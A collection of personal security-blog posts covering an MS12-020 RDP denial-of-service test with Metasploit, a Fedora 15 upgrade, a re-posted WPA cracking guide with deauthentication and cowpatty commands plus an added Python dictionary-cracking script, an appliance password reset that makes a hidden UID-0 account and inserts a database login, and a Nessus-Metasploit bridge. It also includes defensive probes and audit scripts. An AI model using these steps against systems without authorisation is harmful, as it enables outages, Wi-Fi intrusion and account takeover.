MS12-020 RDP Vulnerability overview and testing


By now, if you have been paying attention to your news reader, Google+ or Twitter feed, you will have noticed that Microsoft released a patch (MS12-020) for a nasty Remote Desktop Protocol vulnerability that, at the very least, yields a denial of service (DoS). Here is a bit of information about the vulnerability from the bulletin: "This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol. The more severe of these vulnerabilities could allow remote code execution if an attacker sends a sequence of specially crafted RDP packets to an affected system."

In short, the system crashes with a "blue screen of death" and reboots; the more severe variant would allow an attacker to execute code remotely on the affected system. The crafted packets are processed before any authentication takes place, which is why an unpatched RDP port exposed to the internet is such a problem. Even though this patch was released over two weeks ago, most organizations are still vulnerable, not because they choose to be but because most places have a "patch cycle" that requires extensive testing prior to deployment.

As explained by the fine people over at the ISC Diary, the Microsoft patch has several reference KBs: "KB2671387 (Remote Code Execution - CVE-2012-0002) and KB2667402 (Denial of Service - CVE-2012-0152) or KB2621440. The reference for the update you'll see on a Windows system, when installed, depends on the version of the OS you're running. For Windows 7 you'll likely note KB2667402, whereas you should only expect KB2621440 on a Windows XP host." As always, before applying any patch, make sure you read the release notes.
We recently patched our internet-facing servers that had RDP enabled, and everything went well with the exception of one server that we were unable to log back into via RDP; we had to gain access to the server via the iLO port, apply a few additional patches and reboot, and that seemed to solve the issue. Now for the fun part: if you would like to test the proof-of-concept exploit for this vulnerability, grab a copy of Metasploit and follow the steps below.
 My Test setup:
  • Linux (SolusOS)
  • VirtualBox VM running Windows Server 2008 (with RDP enabled)

Launch msfconsole and follow the steps outlined here:

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf  auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  3389             yes       The target port

msf  auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.2.10
RHOST => 192.168.2.10
msf  auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.2.10:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.2.10:3389 - 210 bytes sent
[*] 192.168.2.10:3389 - Checking RDP status...
[+] 192.168.2.10:3389 seems down
[*] Auxiliary module execution completed

RHOST = the target host running a vulnerable (unpatched) version of RDP. The module's final check only tells you that port 3389 stopped answering, which on a vulnerable host means the box blue-screened and is rebooting.
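Before and after knocking a host over with the module above, it helps to have a probe that speaks just enough RDP to tell "listening and negotiating" apart from "down or still rebooting", and that also reports whether the server enforces Network Level Authentication, the workaround Microsoft lists for MS12-020. The following is an added example written for this page, not code from the original post or from Metasploit; it performs the X.224 Connection Request / Confirm exchange from MS-RDPBCGR sections 2.2.1.1 and 2.2.1.2 and never gets as far as the MCS layer where the bug lives. The host 192.168.2.10 is the lab address from the post; the sample byte strings in the comments are constructed.

```python
"""Non-destructive RDP probe: one X.224 Connection Request, then parse the Connection Confirm.
Added example for this page; message layouts follow MS-RDPBCGR 2.2.1.1 / 2.2.1.2."""
import socket
import struct
import sys

PROTOCOL_RDP = 0x00000000     # standard RDP security (legacy; the pre-auth path MS12-020 abuses)
PROTOCOL_SSL = 0x00000001     # TLS
PROTOCOL_HYBRID = 0x00000002  # CredSSP, i.e. Network Level Authentication

TYPE_RDP_NEG_REQ, TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 0x01, 0x02, 0x03
X224_CONNECTION_CONFIRM = 0xD0

FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER",
    2: "SSL_NOT_ALLOWED_BY_SERVER",
    3: "SSL_CERT_NOT_ON_SERVER",
    4: "INCONSISTENT_FLAGS",
    5: "HYBRID_REQUIRED_BY_SERVER",   # the server insists on NLA
    6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols=PROTOCOL_RDP):
    """TPKT header + X.224 Connection Request TPDU carrying an RDP_NEG_REQ.
    With PROTOCOL_RDP this is byte-for-byte: 03 00 00 13 0e e0 00 00 00 00 00 01 00 08 00 00 00 00 00"""
    # RDP_NEG_REQ: type, flags, length (always 8), requestedProtocols; all little-endian
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested_protocols)
    # X.224: LI counts every byte after itself: CR/CDT(1) DST-REF(2) SRC-REF(2) CLASS(1) + the 8-byte negReq
    x224 = struct.pack(">BBHHB", 6 + len(neg_req), 0xE0, 0, 0, 0) + neg_req
    # TPKT: version 3, reserved, total length (big-endian)
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


def parse_connection_confirm(data):
    """Interpret the server's reply; returns a dict describing the negotiation outcome and NLA enforcement."""
    if len(data) < 11 or data[0] != 3:
        raise ValueError("not a TPKT-framed X.224 PDU")
    if struct.unpack(">H", data[2:4])[0] != len(data):
        raise ValueError("TPKT length field does not match the data")
    result = {"x224_code": data[5] & 0xF0, "negotiation": False, "nla_required": False}
    if result["x224_code"] != X224_CONNECTION_CONFIRM:
        return result                 # refused at the transport layer
    if len(data) == 11:
        return result                 # legacy server (e.g. 03 00 00 0b 06 d0 00 00 12 34 00): no RDP_NEG_RSP
    ntype, _flags, _length, value = struct.unpack("<BBHI", data[11:19])
    result["negotiation"] = True
    if ntype == TYPE_RDP_NEG_RSP:
        result["selected_protocol"] = value
    elif ntype == TYPE_RDP_NEG_FAILURE:
        result["failure_code"] = value
        result["failure_name"] = FAILURE_CODES.get(value, "UNKNOWN")
        result["nla_required"] = value == 5   # asked for plain RDP, server demands CredSSP
    return result


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf


def probe(host, port=3389, timeout=5.0, requested_protocols=PROTOCOL_RDP):
    """One TCP connection, one request. None means closed, filtered or unresponsive (e.g. mid-BSOD reboot)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_connection_request(requested_protocols))
            head = _recv_exact(s, 4)
            body = _recv_exact(s, struct.unpack(">H", head[2:4])[0] - 4)
    except OSError:
        return None
    return parse_connection_confirm(head + body)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.2.10"   # the lab host from the post
    r = probe(target)
    if r is None:
        print("%s:3389 not answering (down, filtered, or still rebooting)" % target)
    elif r["nla_required"]:
        print("%s:3389 up, NLA enforced (%s)" % (target, r["failure_name"]))
    else:
        print("%s:3389 up, accepts pre-auth RDP negotiation: %s" % (target, r))
```

Run it once before the Metasploit module (expect a Connection Confirm), then poll it afterwards: `None` for a minute or two followed by a Confirm again is the reboot the screenshot shows. A `HYBRID_REQUIRED_BY_SERVER` answer to a plain-RDP request means NLA is on, which is the state you want on anything you cannot patch immediately.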

Screenshot of server 2008 reacting to the exploit
Now go out and patch your systems, and if you have some time, load Metasploit on a host of your choice and do some testing (against systems you own or have permission to test, since this module crashes the target).

Mitigation:

http://isc.sans.edu/diary.html?storyid=12808 (ISC Diary write-up with the KB mapping above)
http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids (the Metasploit DoS module used above)

http://technet.microsoft.com/en-us/library/cc732713.aspx (configuring Network Level Authentication for Remote Desktop Services, the workaround Microsoft lists for hosts that cannot be patched right away)

My Fedora 15 experience

So as most of you might know by now, the development team over at Fedora has released a new version of the ever-popular Linux distribution: Fedora 15, code name "Lovelock". This posting is not going to get into too much detail about the new version or the various ways in which you can install it; for that you can visit the Fedora documentation wiki.

The following are major features for Fedora 15:
  • GNOME 3 including the new GNOME 3 shell
  • KDE 4.6 with the improved Plasma workspace, enhanced core applications, and greater memory efficiency.
  • XFCE 4.8 with a new panel, Thunar enhancements and more.
  • Virtualization improvements including Spice support in virt-manager and support for Xen hosts.

Those features listed above are just a few of the great improvements that the new version has to offer, but as with anything new there is some give and take. I took the leap of faith and installed the new version the day after it was released, and I must say it was not what I was expecting at all.

Since I was running Fedora 14 on my Eee PC I figured it was going to be a quick and easy upgrade, so I went over to the wiki and followed the steps below:

First install the new fedora 15 gpg key. You may wish to verify this package against https://fedoraproject.org/keys and the fedora ssl certificate.

rpm --import https://fedoraproject.org/static/069C8460.txt

Upgrade all packages with

yum update yum
yum clean all
yum --releasever=15 --disableplugin=presto distro-sync

Problem #1

As simple as the above upgrade looked, it didn't turn out to be so simple for me: the upgrade process kept failing, and when it finally worked and I was prompted to reboot, the system would hang at the logo.

If I hit the ESC key during boot-up I would notice that the system was hanging at "Starting SYSV: Late init script for live image, Started SYSV: Late init script for live image".

At this point I knew it was time to sign up for the mailing list and visit freenode.net #fedora in search of an answer, but since it was a new release everyone else was also asking for help, so I had to wait a bit.

I tried a few things but in the end wiped out my Fedora 14 and installed Fedora 15. At that point I got a potential fix in a reply to my mailing-list cry for help; the suggestion was to:

Log into single-user mode and remove all kmod packages, then install the akmod packages from the command line.

Once my new install was finished I quickly realized that GNOME 3 was not the way to go on my Eee netbook; I immediately had the following issues:

  • The screen kept dimming even though I changed the power management and other settings.
  • My wireless connection strength dropped by about 50% even though I was in the same room as the AP; prior to Fedora 15 I had a near-perfect signal.
  • The entire windowing experience was too slow and bulky-looking for my netbook; it was hard to work with two windows side by side.

Hacking the WPA Airwaves

I recently picked up the book Hacking Exposed Wireless 2nd Ed; it looks like an awesome book and I can't wait to start testing some of the fun stuff that Joshua, Johnny and Vincent have lined up. Today, while following a discussion in the Pauldotcom IRC room, someone pointed me to this guide and I felt it was worth a re-post. Enjoy.

Hacking the WPA Airwaves

by Mark Bennett, infosecisland.com
May 16th 2011

It is interesting how many people believe that their wireless is secure because they are using WPA.

Well, we did a test recently and were able to basically password-guess our way in with a dictionary attack using either a straight dictionary or a rainbow table.

The cool thing is I bought an ALFA USB antenna and could sit down at the corner coffee place and still see my wireless access point.

Security people: Be sure that your WPA password is an unreadable string, not something found in a dictionary, and not a phrase that you can read like op3nth3p0dbayd00rs, the tables of today are too intelligent for that.

In a nutshell using linux this is how it is done:

Part I

airmon-ng start wlan0 (this puts the wireless card in promiscuous mode)

kismet -c wlan0

  • close console window to see collection of packets
  • use Alt+K to get to the top pull-down menus; turn on the ability to see the type of access point, BSSID, a guess at the IP address, and channel #

Ctrl-C to exit kismet

airmon-ng stop wlan0

Part II

airmon-ng start wlan0

airodump-ng -c <channel> --bssid <bssid> -w <capture prefix> wlan0

Example:

airodump-ng -c 9 --bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0  * Note: D-Link-01.cap is where the capture of all traffic will go

Now open another window, as we need to force a re-connect from the target (see the Note below):

aireplay-ng -0 <count> -a <bssid> -c <client mac> wlan0

Example:

aireplay-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0

You will see at the top of the airodump window a WPA re-key; capture some traffic and exit, and you will have captured all the traffic in the D-Link-01.cap file.

Part III

Download either rainbow tables or direct dictionary from offensive security: offensive-security.com/wpa-tables

If using hashes (rainbow)

cowpatty -r <capture file> -d <hash file> -s <ssid>

Example:

cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite

If using Dictionary words:

cowpatty -r <capture file> -f <wordlist> -s <ssid>

Example:

cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite

Note : If you are in an environment that has a lot of cell phones like the iPhone, (and they are using their wireless to connect to the network) we found these all go to sleep when their screen is turned off then their wireless Ethernet card has a wake-up when the screen is activated.

So you don’t need to send de-auth all you got to do is hang around long enough for someone to touch their iPhone or whatever cell and have it wake up it’s wireless and re-auth to the network, in other words there is the weakest link! — LOL!

Happy Cracking…

As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY—I’m Out!

Cross-posted from Darknet Consulting

Original Page: https://www.infosecisland.com/blogview/13748-Hacking-the-WPA-Airwaves.html
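What makes the attack in the re-posted article work is that WPA-PSK derives its master key from nothing but the passphrase and the SSID, and the 4-way handshake's MIC lets an attacker test a guess offline. The block below is an added example written for this page, not Mark Bennett's code and not part of the original article: it implements the PBKDF2 PMK derivation (the reason cowpatty needs -s and the offensive-security tables are built per SSID), the PRF-512 PTK expansion, the EAPOL-Key MIC, and the dictionary loop that ties them together. Because it has to run offline, make_sample_handshake() fabricates a self-consistent message-2 handshake from constructed nonces and EAPOL bytes; the BSSID and client MAC are the ones from the article's airodump/aireplay examples and the SSID is the "dynamite" from its cowpatty example. On a real capture those values come out of the .cap file.

```python
"""WPA/WPA2-PSK dictionary attack reduced to the key derivation that makes it possible.
Added example for this page; not part of the re-posted article. Handshake values are constructed."""
import hashlib
import hmac


def wpa_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes), per IEEE 802.11i.
    The SSID acts as the salt, which is why a precomputed table is only good for one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk, aa, spa, anonce, snonce):
    """PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b""
    for i in range(4):   # 4 x 160 bits; the PTK is the first 512
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return ptk[:64]      # bytes 0..15 are the KCK that keys the MIC


def eapol_mic(kck, eapol_frame, version=2):
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed:
    HMAC-MD5 for WPA (descriptor version 1), HMAC-SHA1 truncated to 16 bytes for WPA2 (version 2)."""
    return hmac.new(kck, eapol_frame, hashlib.md5 if version == 1 else hashlib.sha1).digest()[:16]


def crack(handshake, wordlist):
    """Dictionary attack: recompute the MIC for each candidate; a match proves the passphrase.
    The 4096-round PBKDF2 per word is the cost a rainbow table pays once per SSID."""
    for word in wordlist:
        pmk = wpa_pmk(word, handshake["ssid"])
        kck = wpa_ptk(pmk, handshake["aa"], handshake["spa"], handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"], handshake["version"]), handshake["mic"]):
            return word
    return None


def make_sample_handshake(passphrase, ssid="dynamite", version=2):
    """Build a self-consistent message-2 handshake for testing (constructed values, not a real capture)."""
    hs = {
        "ssid": ssid,
        "version": version,
        "aa": bytes.fromhex("001b11ec3dd7"),     # AP BSSID from the article's airodump example
        "spa": bytes.fromhex("002000385106"),    # client MAC from the article's aireplay example
        "anonce": bytes(range(0x20, 0x40)),     # constructed 32-byte nonces
        "snonce": bytes(range(0xA0, 0xC0)),
        # constructed EAPOL-Key frame: version/type/length + key descriptor, MIC field already zeroed
        "eapol": b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(113),
    }
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
    hs["mic"] = eapol_mic(kck, hs["eapol"], version)
    return hs


if __name__ == "__main__":
    hs = make_sample_handshake("correcthorse")
    print("recovered:", crack(hs, ["password", "letmein", "correcthorse", "qwerty"]))
```

The first assertion below is the published IEEE 802.11i test vector for passphrase "password" on SSID "IEEE"; the second shows that the same passphrase on a different SSID yields a different PMK, which is the whole reason the downloadable tables are indexed by SSID and why the article's advice about unreadable, non-dictionary passphrases is what actually stops this.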

Notes for Linux Basix Episode 39

I will be joining the guys over at the Linux Basix podcast tonight, and below are some of the things I intend to discuss.

Discussion Links:

  1. 7 Best Network Security Linux Distributions (DoortoDoor): a list of special-purpose distros [BackTrack, Network Security Toolkit (NST), Pentoo, nUbuntu (Network Ubuntu), Security Tools Distribution (STD), Helix, Damn Vulnerable Linux]. These distributions are mainly designed to perform network security tasks such as vulnerability assessment and penetration testing in order to prevent and monitor unauthorized entry, abuse, alteration, or denial of computer network resources. Since most of these distros are available as Live CDs, you can instantly try or use them without a hard disk installation. Read more over at http://www.junauza.com/2011/01/network-security-linux-distros.html
  2. Soundminer: A Stealthy and Context-Aware Sound Trojan for Smartphones: researchers have developed a low-profile Trojan horse program for Google's Android mobile OS that steals data in a way that is unlikely to be detected by either a user or antivirus software. The malware, called Soundminer, monitors phone calls and records when a person, for example, says their credit card number or enters one on the phone's keypad, according to the study. Using various analysis techniques, Soundminer trims the extraneous recorded information down to the most essential, such as the credit card number itself, and sends just that small bit of information back to the attacker over the network, the researchers said. Read more over at http://www.csoonline.com/article/656264/soundminer-android-malware-listens-then-steals-phone-data

Tech Segment: Password reset the hard way

Problem: I was tasked with retrieving or resetting the web login password on a Linux-based, custom-built system, very similar to an appliance. I had limited shell access to the system; however, I was not certain whether the password was stored in /etc/passwd or in some sort of database on the system.

**Before we begin, just know that everything mentioned here will probably not work on a normal Ubuntu-based system; the manufacturer possibly used their own custom kernel and other system tweaks.**

Commands used:

  1. netstat – a command-line tool that displays network connections, routing tables, and a number of network interface statistics.
  2. fuser – a command line tool to identify processes using files or sockets.
  3. lsof – a command line tool to list open files under Linux / UNIX to report a list of all open files and the processes that opened them.
  4. /proc/$pid/ file system - under Linux, /proc includes a directory for each running process (including kernel processes) at /proc/PID, containing information about that process, notably the executable (exe) and working directory (cwd) of the process that opened a port.
  5. uname - print the name of the current system and kernel.

Phase one “Getting to know the system”:

I started off with a few simple commands to try to identify what variant of Linux the system was running:

uname -a (Verify what kernel version I was up against)

yum (To see if it was a Fedora based system)

apt-get (To see if it was an Ubuntu based system and it was)

cat /etc/issue (To check what flavor of Ubuntu, turned out it was “Ubuntu 8.04”)

Next I wanted to get root access without resetting the root account password. I figured this would prevent me from having to deal with any restriction issues.

Created a user called testuser:
user@host:~$ sudo adduser testuser

Edited the password file and changed the UID and GID to those of root (testuser:x:0:0):
user@host:~$ sudo nano /etc/passwd

Then once I logged in as the newly created testuser I was automatically given root access:
user@host:~$ su - testuser
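Seen from the other side, the UID-change trick above is easy to spot: /etc/passwd should contain exactly one UID-0 account. The following is an added example, not from the original post, that parses passwd(5) and reports root-equivalent accounts, empty password fields and shared UIDs. SAMPLE_PASSWD is constructed and includes the testuser:x:0:0 entry from the step above; on a live box read /etc/passwd instead.

```python
"""Audit /etc/passwd for root-equivalent and otherwise suspicious accounts.
Added example for this page; SAMPLE_PASSWD is constructed."""
import collections

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
app_user:x:112:113::/opt/app_name:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
testuser:x:0:0:,,,:/home/testuser:/bin/bash
"""


def parse_passwd(text):
    """Return one dict per well-formed passwd(5) line (seven colon-separated fields); others are skipped."""
    users = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        try:
            users.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid), "home": home, "shell": shell})
        except ValueError:          # non-numeric uid/gid: malformed, skip it
            continue
    return users


def root_equivalents(text):
    """Names of accounts other than root whose UID is 0."""
    return [u["name"] for u in parse_passwd(text) if u["uid"] == 0 and u["name"] != "root"]


def audit_passwd(text):
    """Findings a reviewer wants: extra UID-0 accounts, empty password fields, shared non-zero UIDs."""
    users = parse_passwd(text)
    findings = []
    for u in users:
        if u["uid"] == 0 and u["name"] != "root":
            findings.append("%s has UID 0 (root-equivalent), home %s, shell %s" % (u["name"], u["home"], u["shell"]))
        if u["pw"] == "":
            findings.append("%s has an empty password field (no password required)" % u["name"])
    by_uid = collections.defaultdict(list)
    for u in users:
        by_uid[u["uid"]].append(u["name"])
    for uid, names in by_uid.items():
        if uid != 0 and len(names) > 1:     # UID 0 collisions are already reported above
            findings.append("UID %d shared by %s" % (uid, ", ".join(names)))
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

On a live system a second tell-tale is that the home directory adduser created (here /home/testuser) is still owned by the original numeric UID, not by 0, so `stat` on the home directories of any UID-0 accounts catches the same edit from a different angle.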

Since I knew that the service I was interested in was running on port 443, I ran a few commands to get a better idea of what was really going on with that port.

netstat to view the connection state and PID of the service listening on port 443:

root@host:~# netstat -tulpn | grep 443

tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      5548/pound

To confirm the processes PID use the fuser command:

root@host:~# fuser 443/tcp
443/tcp:              5548  5549

To find out process name and working directory associated with PID # 5548, enter:

root@host:~# ls -l /proc/5548/exe
lrwxrwxrwx 1 root root 0 Jan 21 14:15 /proc/5548/exe -> /opt/pound/sbin/pound

root@host:~# ls -l /proc/5548/cwd
lrwxrwxrwx 1 root root 0 Jan 21 14:15 /proc/5548/cwd -> /opt/app_name/rails/ssl

Now I have an application name and working directory to go investigate. After further research I found out that Pound is a reverse-proxy load balancing server, and the config file showed me it was passing all connection on port 443 to another port on the same server.

I then used lsof to further investigate the newly discovered port:

root@host:# lsof -Pnl +M -i4
mongrel_r 5623      112    3u  IPv4  14528       TCP 127.0.0.1:3000 (LISTEN)

Then to find out the process owner:
root@host:# ps aux | grep 5623

app_user      5623  0.0  1.3  40048 28536 ?        Sl   14:14   0:02 /usr/bin/ruby1.8 /usr/bin/mongrel_rails start -d -e production -p 3000 -a 127.0.0.1 -P log/mongrel.3000.pid --user app_user --group app_name

A bit more research and I found out what mongrel_rails was. Mongrel is a fast HTTP library and server for Ruby that is intended for hosting Ruby web applications of any kind using plain HTTP rather than FastCGI or SCGI.
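netstat -tulpn, fuser and lsof all get their answers from the same two places: the socket table in /proc/net/tcp (which carries the socket inode) and the socket:[inode] links under /proc/<pid>/fd. The block below is an added example, not from the original post, that does that walk by hand and then reads the same exe and cwd links the post inspects. SAMPLE_PROC_NET_TCP is a constructed dump mirroring the listeners on the page (0.0.0.0:443 and 127.0.0.1:3000, the latter with inode 14528 as lsof showed); the address column is assumed little-endian (x86), and seeing other users' fd tables needs root, just like netstat -p.

```python
"""Map listening TCP ports to owning processes straight from /proc.
Added example for this page; SAMPLE_PROC_NET_TCP is constructed."""
import os
import socket
import struct

TCP_LISTEN = "0A"   # value of the hex 'st' column for a listening socket

SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:01BB 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 14510 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0BB8 00000000:0000 0A 00000000:00000000 00:00000000 00000000   112        0 14528 1 0000000000000000 100 0 0 10 0
   2: 03131D0A:01BB 0502A8C0:D2B4 01 00000000:00000000 00:00000000 00000000     0        0 15001 1 0000000000000000 20 4 30 10 -1
"""


def parse_proc_net_tcp(text):
    """Return (local_ip, local_port, state, uid, inode) for every row of a /proc/net/tcp dump.
    Addresses are hex in host byte order, so on x86 the octets come out reversed (assumed little-endian)."""
    rows = []
    for line in text.splitlines()[1:]:          # first line is the column header
        f = line.split()
        if len(f) < 10:
            continue
        ip_hex, port_hex = f[1].split(":")
        ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
        rows.append((ip, int(port_hex, 16), f[3], int(f[7]), int(f[9])))
    return rows


def listening_sockets(text):
    return [r for r in parse_proc_net_tcp(text) if r[2] == TCP_LISTEN]


def socket_owners(inodes, proc="/proc"):
    """Walk every /proc/<pid>/fd; an fd link pointing at 'socket:[N]' ties inode N to that pid."""
    wanted = {"socket:[%d]" % i: i for i in inodes}
    owners = {}
    for pid in filter(str.isdigit, os.listdir(proc)):
        fd_dir = os.path.join(proc, pid, "fd")
        try:
            targets = [os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)]
        except OSError:        # process exited, or not ours and we are not root
            continue
        for t in targets:
            if t in wanted:
                owners.setdefault(wanted[t], []).append(int(pid))
    return owners


def describe_pid(pid, proc="/proc"):
    """The same two links the post reads by hand: /proc/<pid>/exe and /proc/<pid>/cwd."""
    out = {}
    for name in ("exe", "cwd"):
        try:
            out[name] = os.readlink(os.path.join(proc, str(pid), name))
        except OSError:
            out[name] = None
    return out


def port_owners(text=None, proc="/proc"):
    """{(ip, port): [(pid, exe, cwd), ...]} for every listener; reads the live table when text is None."""
    if text is None:
        with open(os.path.join(proc, "net", "tcp")) as fh:
            text = fh.read()
    listeners = listening_sockets(text)
    owners = socket_owners([r[4] for r in listeners], proc)
    report = {}
    for ip, port, _state, _uid, inode in listeners:
        procs = []
        for pid in owners.get(inode, []):
            d = describe_pid(pid, proc)
            procs.append((pid, d["exe"], d["cwd"]))
        report[(ip, port)] = procs
    return report


if __name__ == "__main__":
    for (ip, port), procs in sorted(port_owners().items()):
        print("%s:%d" % (ip, port), procs or "(owner not visible; run as root)")
```

Run as root it prints the same pound-on-443 and mongrel-on-3000 picture the post reached with netstat, fuser, ls -l /proc/PID/exe and lsof, and because it keys on the socket inode it is not fooled by a process that renamed itself in its argv.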

After poking around a bit more I noticed the tie-in with a PostgreSQL server that I had seen in a few earlier commands. Now on to the fun part!

Phase two “Modifying the system”:

Now that I have realized that the system has a database, and the user account is not located in the /etc/passwd file, it's time to access the database, identify the user account and make some modifications.

su - postgres to change to the postgres database user:
root@host:~# su - postgres

Launching the PostgreSQL interactive terminal:
postgres@piab:~$ psql

List all the roles and superusers:
postgres=# \du
                List of roles
 Role name | Superuser | Create role | Create DB | Connections | Member of
-----------+-----------+-------------+-----------+-------------+-----------
 postgres  | yes       | yes         | yes       | no limit    |
 App_User  | no        | no          | no        | no limit    |
(2 rows)

List all databases on the system:

postgres=# \l
        List of databases
   Name    |  Owner   | Encoding
-----------+----------+----------
 postgres  | postgres | UTF8
 App_Name  | postgres | UTF8

Connect to a database:
postgres=# \c App_Name

List the tables:
App_Name=# \dt

 Schema |        Name        | Type  | Owner
--------+--------------------+-------+----------
 public | schema_info        | table | App_User
 public | users              | table | App_User

Query the users table:
App_Name=# select * from users;

Fields of interest to me were id, login, email, password, salt_val, passwd_create and passwd_updated.

Now before I went any further I made sure to dump the DB using pg_dump and pg_dumpall:
postgres@host:~$ pg_dump dbname > /tmp/dbname.out
postgres@host:~$ pg_dumpall > /tmp/db.out

At this point I had a few options:

  • Try to reverse the password encryption and salting mechanism
  • Try to find the code that handles the authentication and bypass that
  • Get access to another box, create a password and copy that hash and encrypted value over to the DB on the other system.

Luckily for me I had access to another device, so I created a password there, queried that DB and copied the encrypted password and hash into Notepad, then used an insert statement to add the values to the DB along with a test user.

Connected back to the DB:
postgres=# \c App_Name

Insert the new record:
App_Name=# INSERT INTO users (id,login,email,password,salt_val,created_at) VALUES ('2','demo','demo@localhost','9abdgagf42324243240fdbd','8d5d6cd8fa6a0323jb3240988324','2006-12-05 21:15:32');

Went back to the login portal at https://ipaddress and bingo! Big shout-out to byte_bucket over at irc.freenode.net #pauldotcom; he was very helpful in helping me work through this.

Additional reading:

http://www.cyberciti.biz/faq/what-process-has-open-linux-port/

http://linux.die.net/man/8/pound

http://linux.die.net/man/1/pg_dump

https://support.eapps.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=180

http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/


Nessus and Metasploit living in harmony

I had this post queuing up for a while now but kept holding back waiting on the new version of Metasploit 3.5.0-dev, in addition each time I visited the Metasploit IRC room I would see Zate talking about some cool feature he is working on implementing.

Now on to the reason for this post. Being a fan of both Metasploit and Nessus, I was very happy when I saw a tweet a month or so back mentioning a project that would bring both of these wonderful tools together in a nice, easy-to-use fashion. That project was labeled "Nessus Bridge for Metasploit". The basic goal behind this project was "to allow you to do various tasks with your Nessus server, from within the msf command line. By that I mean scan with Nessus, review the results, import the results and then exploit the results." After reading those few lines from the project home page I was already sold.

What can you do with this plug-in or bridge, you might ask?

The commands are broken up into several categories and are covered in detail over at http://blog.zate.org .

A few prerequisites are needed before you can start hacking away:

  • A host with Metasploit installed and configured (I recommend BackTrack 4)
  • A host with a Nessus server installed and updated (I recommend you install on your BT4 host)
  • A vulnerable host to test with (I recommend you download metasploitable)

Brief  demo section before I get into the interview:

MSF Console

Nessus Login Interface

  1. First fire up both Metasploit and Nessus and run an update to ensure you have the latest plugins/signatures.
  2. Log into Nessus and create your scanning policy.
  3. Close out your browser and prepare to have some fun CLI style!
    1. Load the Nessus plugin within msfconsole with "load nessus".
    2. Connect to your Nessus server with "nessus_connect username:password@host:port ok".
    3. From this point on you can view all policies (nessus_policy_list) and kick off a scan (nessus_scan_new).
    4. Import the scan results with "nessus_report_get <report id>", then use db_autopwn to seal the deal.

Now on to the Q & A  section with the Author:

Question: How did you get started on your Infosec journey, and also the blogging  sphere?

Answer: I started out as a Secure data communication guy for the Australian Army and then left to became a Lotus Notes/Web App guy, migrated over to a Solaris/Linux admin and then into Web App Sec and Threat/Vuln Management.  From there I became interested in pen testing, exploits and just generally how the attacker works/thinks.

Blogging is relatively new for me.  I am bad at it, and my blog came about really because I wanted to get some ideas down out of my head where others could see them.  I've not really done much in the way of blogging until the Nessus Plugin as I am bad about keeping up with it and finding things to talk about.  Always seemed to be something else to do.  I think the plugin has given me something to start with and now I am queuing up posts for weeks ahead.

Q: What was your motivation behind this project?

A: Part of it was being envious of the cool integration that Nexpose has with Metasploit and most of it was being frustrated at having to move between interfaces to try and find things to exploit.  When I first started with Metasploit it was annoying to have these cool exploits to use but I struggled to find exploitable hosts.

I then did the offensivesecurity.com PwB v3 course and gained some knowledge on how to find things to exploit and then I did some playing around with importing nessus scans.  It was clunky and around the same time I was experimenting with putting a Drupal front end on Nessus. Part of that process was the discovery of a cool nessus-xmlrpc ruby library by k0st.

